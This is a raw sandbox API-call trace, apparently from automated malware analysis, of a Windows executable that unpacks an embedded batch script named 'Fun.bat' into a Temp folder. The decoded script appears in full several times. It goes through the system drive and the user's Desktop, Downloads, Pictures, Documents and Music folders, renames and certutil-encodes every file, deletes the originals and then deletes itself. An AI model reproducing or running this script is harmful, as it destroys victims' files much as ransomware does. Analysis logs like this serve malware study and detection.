Size=0x4a) returned 0x2418320 [0082.895] GetLastError () returned 0x0 [0082.895] SetLastError (dwErrCode=0x0) [0082.895] GetLastError () returned 0x0 [0082.895] SetLastError (dwErrCode=0x0) [0082.895] GetLastError () returned 0x0 [0082.895] SetLastError (dwErrCode=0x0) [0082.895] GetLastError () returned 0x0 [0082.895] SetLastError (dwErrCode=0x0) [0082.895] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x0, Size=0xe4) returned 0x22b10b0 [0082.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="078EFDA905BE29D2B2220056D808BDE2", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0082.895] malloc (_Size=0x22) returned 0x9b1150 [0082.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="078EFDA905BE29D2B2220056D808BDE2", cchWideChar=33, lpMultiByteStr=0x9b1150, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="078EFDA905BE29D2B2220056D808BDE2", lpUsedDefaultChar=0x0) returned 33 [0082.897] free (_Block=0x9b1150) [0082.897] HeapFree (in: hHeap=0x22b0000, dwFlags=0x0, lpMem=0x22b10b0 | out: hHeap=0x22b0000) returned 1 [0082.897] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x5a) returned 0x241a0a0 [0082.897] GetLastError () returned 0x0 [0082.897] SetLastError (dwErrCode=0x0) [0082.897] GetLastError () returned 0x0 [0082.897] SetLastError (dwErrCode=0x0) [0082.897] GetLastError () returned 0x0 [0082.897] SetLastError (dwErrCode=0x0) [0082.898] GetLastError () returned 0x0 [0082.898] SetLastError (dwErrCode=0x0) [0082.898] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x0, Size=0xe4) returned 0x22b10b0 [0082.898] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="81093E257A0DDDDC4ED186E0A1616949", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0082.898] malloc (_Size=0x22) returned 0x9b1150 [0082.898] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="81093E257A0DDDDC4ED186E0A1616949", cchWideChar=33, lpMultiByteStr=0x9b1150, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="81093E257A0DDDDC4ED186E0A1616949", lpUsedDefaultChar=0x0) returned 33 [0082.899] free (_Block=0x9b1150) [0082.899] HeapFree (in: hHeap=0x22b0000, dwFlags=0x0, lpMem=0x22b10b0 | out: hHeap=0x22b0000) returned 1 [0082.899] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x5a) returned 0x241a108 [0082.899] GetLastError () returned 0x0 [0082.899] SetLastError (dwErrCode=0x0) [0082.899] GetLastError () returned 0x0 [0082.900] SetLastError (dwErrCode=0x0) [0082.900] GetLastError () returned 0x0 [0082.900] SetLastError (dwErrCode=0x0) [0082.900] GetLastError () returned 0x0 [0082.900] SetLastError (dwErrCode=0x0) [0082.900] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x0, Size=0xe4) returned 0x22b10b0 [0082.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="274621BA719538FEC55EEE280F504E4AA18F0DD3", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0082.900] malloc (_Size=0x2a) returned 0x9b1150 [0082.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="274621BA719538FEC55EEE280F504E4AA18F0DD3", cchWideChar=41, lpMultiByteStr=0x9b1150, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="274621BA719538FEC55EEE280F504E4AA18F0DD3", lpUsedDefaultChar=0x0) returned 41 [0082.901] free (_Block=0x9b1150) [0082.901] HeapFree (in: hHeap=0x22b0000, dwFlags=0x0, lpMem=0x22b10b0 | out: hHeap=0x22b0000) returned 1 [0082.901] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x5a) returned 0x241a170 [0082.901] GetLastError () returned 0x0 [0082.901] SetLastError (dwErrCode=0x0) [0082.901] GetLastError () returned 0x0 [0082.901] SetLastError (dwErrCode=0x0) [0082.901] GetLastError () returned 0x0 [0082.901] SetLastError (dwErrCode=0x0) [0082.902] GetLastError () returned 0x0 [0082.902] SetLastError (dwErrCode=0x0) [0082.902] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x0, Size=0xe4) returned 0x22b10b0 [0082.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AD5086907DA70304084CF734FA847459404023AA", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0082.902] malloc (_Size=0x2a) returned 0x9b1150 [0082.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AD5086907DA70304084CF734FA847459404023AA", cchWideChar=41, lpMultiByteStr=0x9b1150, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AD5086907DA70304084CF734FA847459404023AA", lpUsedDefaultChar=0x0) returned 41 [0082.903] free (_Block=0x9b1150) [0082.903] HeapFree (in: hHeap=0x22b0000, dwFlags=0x0, lpMem=0x22b10b0 | out: hHeap=0x22b0000) returned 1 [0082.903] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x5a) returned 0x241a1d8 [0082.903] GetLastError () returned 0x0 [0082.903] SetLastError (dwErrCode=0x0) [0082.903] GetLastError () returned 0x0 [0082.903] SetLastError (dwErrCode=0x0) [0082.903] wcslen (_String="BC0CC03D80F5B3A0C5F6C7DBFA9093C090A14FA7") returned 0x28 [0082.904] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x5a) returned 0x241a240 [0082.904] FindResourceW (hModule=0x400000, lpName="BC0CC03D80F5B3A0C5F6C7DBFA9093C090A14FA7", lpType=0xa) returned 0x0 [0082.904] GetLastError () returned 0x716 [0082.904] SetLastError (dwErrCode=0x716) [0082.904] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x241a240 | out: hHeap=0x2410000) returned 1 [0082.904] GetLastError () returned 0x0 [0082.904] SetLastError (dwErrCode=0x0) [0082.904] GetLastError () returned 0x0 [0082.904] SetLastError (dwErrCode=0x0) [0082.904] GetLastError () returned 0x0 [0082.904] SetLastError (dwErrCode=0x0) [0082.904] wcslen (_String="AB3310E66B933AC8BA44A293A8D9A7BE45114BA9") returned 0x28 [0082.904] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x5a) returned 0x241a240 [0082.904] FindResourceW (hModule=0x400000, lpName="AB3310E66B933AC8BA44A293A8D9A7BE45114BA9", lpType=0xa) returned 0x419310 [0082.904] LoadResource (hModule=0x400000, hResInfo=0x419310) returned 0x443d8c [0082.904] SizeofResource (hModule=0x400000, hResInfo=0x419310) returned 0x8 [0082.905] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x8, Size=0x8) returned 0x9007c8 [0082.905] FreeResource (hResData=0x443d8c) returned 0 [0082.905] RtlSizeHeap (HeapHandle=0x900000, Flags=0x0, MemoryPointer=0x9007c8) returned 0x8 [0082.905] wcslen (_String="078EFDA905BE29D2B2220056D808BDE2") returned 0x20 [0082.905] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x4a) returned 0x2418740 [0082.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="078EFDA905BE29D2B2220056D808BDE2", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0082.905] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x8, Size=0x21) returned 0x9007d8 [0082.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="078EFDA905BE29D2B2220056D808BDE2", cchWideChar=-1, lpMultiByteStr=0x9007d8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="078EFDA905BE29D2B2220056D808BDE2", lpUsedDefaultChar=0x0) returned 33 [0082.905] RtlSizeHeap (HeapHandle=0x900000, Flags=0x0, MemoryPointer=0x9007d8) returned 0x21 [0082.905] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x0, Size=0x418) returned 0x22b10b0 [0082.905] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x0, Size=0x418) returned 0x22b14d0 [0082.905] HeapFree (in: hHeap=0x22b0000, dwFlags=0x0, lpMem=0x22b10b0 | out: hHeap=0x22b0000) returned 1 [0082.905] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x0, Size=0x1c) returned 0x22b10b0 [0082.905] HeapFree (in: hHeap=0x22b0000, dwFlags=0x0, lpMem=0x22b14d0 | out: hHeap=0x22b0000) returned 1 [0082.905] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x0, Size=0x1c) returned 0x22b10d8 [0082.905] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9007d8 | out: hHeap=0x900000) returned 1 [0082.905] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x2418740 | out: hHeap=0x2410000) returned 1 [0082.905] HeapFree (in: hHeap=0x22b0000, dwFlags=0x0, lpMem=0x22b10b0 | out: hHeap=0x22b0000) returned 1 [0082.906] HeapFree (in: hHeap=0x22b0000, dwFlags=0x0, lpMem=0x22b10d8 | out: hHeap=0x22b0000) returned 1 [0082.906] GetLastError () returned 0x0 [0082.906] SetLastError (dwErrCode=0x0) [0082.906] GetLastError () returned 0x0 [0082.906] SetLastError (dwErrCode=0x0) [0082.906] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x9007c8, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0082.906] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x9007c8, cbMultiByte=7, lpWideCharStr=0x2410608, cchWideChar=8 | out: lpWideCharStr="Fun.batD80F5B3A0C5F6C7DBFA9093C090A14FA7") returned 7 [0082.906] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x18) returned 0x2417cb0 [0082.906] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9007c8 | out: hHeap=0x900000) returned 1 [0082.906] GetLastError () returned 0x0 [0082.906] SetLastError (dwErrCode=0x0) [0082.906] wcslen (_String="Fun.bat") returned 0x7 [0082.906] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x241a240 | out: hHeap=0x2410000) returned 1 [0082.906] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x2417cb0 | out: hHeap=0x2410000) returned 1 [0082.906] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x18) returned 0x2417e50 [0082.907] GetLastError () returned 0x0 [0082.907] SetLastError (dwErrCode=0x0) [0082.907] GetLastError () returned 0x0 [0082.907] SetLastError (dwErrCode=0x0) [0082.907] wcslen (_String="274621BA719538FEC55EEE280F504E4AA18F0DD3") returned 0x28 [0082.907] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x5a) returned 0x241a240 [0082.907] FindResourceW (hModule=0x400000, lpName="274621BA719538FEC55EEE280F504E4AA18F0DD3", lpType=0xa) returned 0x0 [0082.907] GetLastError () returned 0x716 [0082.907] SetLastError (dwErrCode=0x716) [0082.907] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x241a240 | out: hHeap=0x2410000) returned 1 [0082.907] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0xa) returned 0x24176a8 [0082.907] GetLastError () returned 0x0 [0082.907] SetLastError (dwErrCode=0x0) [0082.907] GetLastError () returned 0x0 [0082.907] SetLastError (dwErrCode=0x0) [0082.908] wcslen (_String="AD5086907DA70304084CF734FA847459404023AA") returned 0x28 [0082.908] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x5a) returned 0x241a240 [0082.908] FindResourceW (hModule=0x400000, lpName="AD5086907DA70304084CF734FA847459404023AA", lpType=0xa) returned 0x0 [0082.908] GetLastError () returned 0x716 [0082.908] SetLastError (dwErrCode=0x716) [0082.908] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x241a240 | out: hHeap=0x2410000) returned 1 [0082.908] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0xa) returned 0x24176d8 [0082.908] GetLastError () returned 0x0 [0082.908] SetLastError (dwErrCode=0x0) [0082.908] GetLastError () returned 0x0 [0082.908] SetLastError (dwErrCode=0x0) [0082.908] wcslen (_String="81093E257A0DDDDC4ED186E0A1616949") returned 0x20 [0082.908] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x4a) returned 0x2418690 [0082.908] FindResourceW (hModule=0x400000, lpName="81093E257A0DDDDC4ED186E0A1616949", lpType=0xa) returned 0x419300 [0082.908] LoadResource (hModule=0x400000, hResInfo=0x419300) returned 0x443898 [0082.908] SizeofResource (hModule=0x400000, hResInfo=0x419300) returned 0x4f3 [0082.909] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x8, Size=0x4f3) returned 0x9007c8 [0082.909] FreeResource (hResData=0x443898) returned 0 [0082.909] RtlSizeHeap (HeapHandle=0x900000, Flags=0x0, MemoryPointer=0x9007c8) returned 0x4f3 [0082.909] wcslen (_String="078EFDA905BE29D2B2220056D808BDE2") returned 0x20 [0082.909] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x4a) returned 0x24184d8 [0082.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="078EFDA905BE29D2B2220056D808BDE2", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0082.909] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x8, Size=0x21) returned 0x900cc8 [0082.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="078EFDA905BE29D2B2220056D808BDE2", cchWideChar=-1, lpMultiByteStr=0x900cc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="078EFDA905BE29D2B2220056D808BDE2", lpUsedDefaultChar=0x0) returned 33 [0082.909] RtlSizeHeap (HeapHandle=0x900000, Flags=0x0, MemoryPointer=0x900cc8) returned 0x21 [0082.909] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x0, Size=0x418) returned 0x22b10b0 [0082.909] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x0, Size=0x418) returned 0x22b14d0 [0082.909] HeapFree (in: hHeap=0x22b0000, dwFlags=0x0, lpMem=0x22b10b0 | out: hHeap=0x22b0000) returned 1 [0082.909] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x0, Size=0x1c) returned 0x22b10b0 [0082.909] HeapFree (in: hHeap=0x22b0000, dwFlags=0x0, lpMem=0x22b14d0 | out: hHeap=0x22b0000) returned 1 [0082.909] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x0, Size=0x1c) returned 0x22b10d8 [0082.909] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x900cc8 | out: hHeap=0x900000) returned 1 [0082.909] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x24184d8 | out: hHeap=0x2410000) returned 1 [0082.909] HeapFree (in: hHeap=0x22b0000, dwFlags=0x0, lpMem=0x22b10b0 | out: hHeap=0x22b0000) returned 1 [0082.909] HeapFree (in: hHeap=0x22b0000, dwFlags=0x0, lpMem=0x22b10d8 | out: hHeap=0x22b0000) returned 1 [0082.909] GetLastError () returned 0x0 [0082.909] SetLastError (dwErrCode=0x0) [0082.910] GetLastError () returned 0x0 [0082.910] SetLastError (dwErrCode=0x0) [0082.910] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x9007c8, cbMultiByte=1266, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1266 [0082.910] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x9007c8, cbMultiByte=1266, lpWideCharStr=0x2410608, cchWideChar=1267 | out: lpWideCharStr="REM\r\n\r\ncd %SystemDrive%\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %UserProFile%\\Desktop\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %UserProFile%\\Downloads\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %UserProFile%\\Pictures\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %UserProFile%\\Documents\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %UserProFile%\\Music\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %SystemDrive%\\\r\n\r\ndel /s /q *.Sister\r\n\r\necho TVqQAAMAAAAEAAAA/9OtNBjEDy9CjXs8kMWBrU=\r\n-----END CERTIFICATE-----\r\n\r\n:1\r\n\r\ndel %0 ") returned 1266 [0082.910] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x9ee) returned 0x241a240 [0082.910] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9007c8 | out: hHeap=0x900000) returned 1 [0082.910] GetLastError () returned 0x0 [0082.910] SetLastError (dwErrCode=0x0) [0082.910] wcslen (_String="REM\r\n\r\ncd %SystemDrive%\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %UserProFile%\\Desktop\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %UserProFile%\\Downloads\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %UserProFile%\\Pictures\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %UserProFile%\\Documents\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %UserProFile%\\Music\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %SystemDrive%\\\r\n\r\ndel /s /q *.Sister\r\n\r\necho TVqQAAMAAAAEAAAA/9OtNBjEDy9CjXs8kMWBrU=\r\n-----END CERTIFICATE-----\r\n\r\n:1\r\n\r\ndel %0") returned 0x4f2 [0082.910] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x2418690 | out: hHeap=0x2410000) returned 1 [0082.910] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x241a240 | out: hHeap=0x2410000) returned 1 [0082.910] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x9ee) returned 0x241a240 [0082.910] GetLastError () returned 0x0 [0082.910] SetLastError (dwErrCode=0x0) [0082.910] GetLastError () returned 0x0 [0082.911] SetLastError (dwErrCode=0x0) [0082.911] GetLastError () returned 0x0 [0082.911] SetLastError (dwErrCode=0x0) [0082.911] GetLastError () returned 0x0 [0082.911] SetLastError (dwErrCode=0x0) [0082.911] wcslen (_String="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA4.tmp") returned 0x3d [0082.911] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x84) returned 0x241ac38 [0082.911] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x8, Size=0x2710) returned 0x9007c8 [0082.911] GetShortPathNameW (in: lpszLongPath="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA4.tmp", lpszShortPath=0x9007c8, cchBuffer=0x2710 | out: lpszShortPath="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA4.tmp") returned 0x3d [0082.912] GetLastError () returned 0x0 [0082.912] SetLastError (dwErrCode=0x0) [0082.912] GetLastError () returned 0x0 [0082.912] SetLastError (dwErrCode=0x0) [0082.912] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x84) returned 0x241acc8 [0082.912] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9007c8 | out: hHeap=0x900000) returned 1 [0082.912] GetLastError () returned 0x0 [0082.912] SetLastError (dwErrCode=0x0) [0082.912] wcslen (_String="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA4.tmp") returned 0x3d [0082.912] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x241ac38 | out: hHeap=0x2410000) returned 1 [0082.912] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x241acc8 | out: hHeap=0x2410000) returned 1 [0082.913] free (_Block=0x9b24f0) [0082.913] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24176a8, Size=0xa) returned 0x2417768 [0082.913] GetLastError () returned 0x0 [0082.913] SetLastError (dwErrCode=0x0) [0082.913] GetLastError () returned 0x0 [0082.913] SetLastError (dwErrCode=0x0) [0082.913] GetLastError () returned 0x0 [0082.913] SetLastError (dwErrCode=0x0) [0082.913] GetLastError () returned 0x0 [0082.913] SetLastError (dwErrCode=0x0) [0082.913] wcslen (_String="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\extd.exe") returned 0x3d [0082.913] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x84) returned 0x241ac38 [0082.913] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x8, Size=0x2710) returned 0x9007c8 [0082.913] GetShortPathNameW (in: lpszLongPath="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\extd.exe", lpszShortPath=0x9007c8, cchBuffer=0x2710 | out: lpszShortPath="") returned 0x0 [0082.914] GetLastError () returned 0x2 [0082.914] SetLastError (dwErrCode=0x2) [0082.914] GetLastError () returned 0x2 [0082.914] SetLastError (dwErrCode=0x2) [0082.914] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0xa) returned 0x24176f0 [0082.914] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9007c8 | out: hHeap=0x900000) returned 1 [0082.914] GetLastError () returned 0x0 [0082.914] SetLastError (dwErrCode=0x0) [0082.914] wcslen (_String="") returned 0x0 [0082.914] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x241ac38 | out: hHeap=0x2410000) returned 1 [0082.914] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x24176f0 | out: hHeap=0x2410000) returned 1 [0082.914] free (_Block=0x9b1150) [0082.914] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417768, Size=0xa) returned 0x2417858 [0082.914] GetLastError () returned 0x0 [0082.914] SetLastError (dwErrCode=0x0) [0082.914] GetLastError () returned 0x0 [0082.914] SetLastError (dwErrCode=0x0) [0082.914] wcslen (_String="@shift /0") returned 0x9 [0082.915] wcslen (_String="\r\n") returned 0x2 [0082.915] wcslen (_String="") returned 0x0 [0082.915] wcslen (_String="REM\r\n\r\ncd %SystemDrive%\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %UserProFile%\\Desktop\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %UserProFile%\\Downloads\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %UserProFile%\\Pictures\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %UserProFile%\\Documents\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %UserProFile%\\Music\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %SystemDrive%\\\r\n\r\ndel /s /q *.Sister\r\n\r\necho TVqQAAMAAAAEAAAA/9OtNBjEDy9CjXs8kMWBrU=\r\n-----END CERTIFICATE-----\r\n\r\n:1\r\n\r\ndel %0") returned 0x4f2 [0082.915] wcslen (_String="") returned 0x0 [0082.915] wcslen (_String="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat") returned 0x3d [0082.915] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x84) returned 0x241ac38 [0082.915] wcslen (_String="@shift /0\r\nREM\r\n\r\ncd %SystemDrive%\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %UserProFile%\\Desktop\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd %UserProFile%\\Downloads\\\r\n\r\nfor %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n\r\nfor %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n\r\ncd 